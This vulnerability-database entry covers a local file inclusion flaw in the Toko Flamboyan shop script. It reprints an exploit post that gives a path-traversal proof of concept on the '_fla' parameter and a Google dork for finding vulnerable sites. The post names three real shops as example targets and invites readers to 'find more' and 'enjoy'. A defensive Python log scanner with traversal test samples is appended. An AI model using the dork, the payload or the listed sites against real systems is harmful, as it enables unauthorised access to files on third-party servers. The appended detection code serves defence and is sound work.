Toko Flamboyan Local File Inclusion

Vulnerability ID 1047122 Vulnerability type
Published 2012-06-27 Updated 2012-06-27
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2012060313
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability EXP
# Exploit Title: Toko Flamboyan - Local File Inclusion
# Author: Dark-Puzzle
# Category : Webapps
# Vendor Homepage: http://www.flamboyan.co.id/
# Google Dork: inurl:"_fla.php?_fla="
# Date: 23 June 2012
# Vendor : Toko Flamboyan
# Version: All Versions 
# Tested on: Windows XP SP2, Backtrack 5
-------------------------------------------------------------
Local File Inclusion :

Exploit Discovered in _fla.php

error :

www.example.com/_fla.php?_fla=..


PoC : 

www.example.com/_fla.php?_fla=../../../../../..[LFI]

Example sites :

http://www.flamboyan-hypermarket.com/_fla.php?_fla=kategori
http://rokok.web.id/_fla.php?_fla=produk
http://bogor.agen.biz/_fla.php?_fla=z_daftar_harga

find more at google , enjoy .



Greetz To : Moroccan Cyber Army , Team-Hunter , Dr.Napst3r ...
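
A defender-side check for the issue described above, added here as an example and not part of the original advisory: it scans web access-log lines for `_fla.php` requests whose `_fla` value is not a plain page name like those in the listed URLs (`kategori`, `produk`, `z_daftar_harga`). The log format, the sample lines and all function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: legitimate _fla values are plain page names (kategori, produk, ...).
SAFE_VALUE = re.compile(r"[A-Za-z0-9_]+")
# Assumption: Apache/nginx combined-log style request field.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, placeholder target "x").
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jun/2012:10:00:01 +0000] "GET /_fla.php?_fla=kategori HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Jun/2012:10:00:05 +0000] "GET /_fla.php?_fla=../../../../x HTTP/1.1" 200 310',
    '203.0.113.7 - - [27/Jun/2012:10:00:09 +0000] "GET /_fla.php?_fla=%252e%252e%252fx HTTP/1.1" 200 310',
    '192.0.2.10 - - [27/Jun/2012:10:00:12 +0000] "GET /index.php?_fla=.. HTTP/1.1" 404 0',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e) for up to max_rounds passes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_fla_values(line):
    """Return decoded _fla values in one log line that are not plain page names."""
    match = REQUEST.search(line)
    if not match:
        return []
    parts = urlsplit(match.group(1))
    if not parts.path.endswith("/_fla.php"):
        return []
    hits = []
    # parse_qs already decodes once; fully_decode handles extra encoding layers.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("_fla", []):
        value = fully_decode(raw)
        if not SAFE_VALUE.fullmatch(value):
            hits.append(value)
    return hits

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious _fla request."""
    return [(n, v) for n, line in enumerate(lines, 1) for v in suspicious_fla_values(line)]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious _fla value {value!r}")
```

The same character allowlist, applied server-side before the value reaches any include call, is the corresponding mitigation.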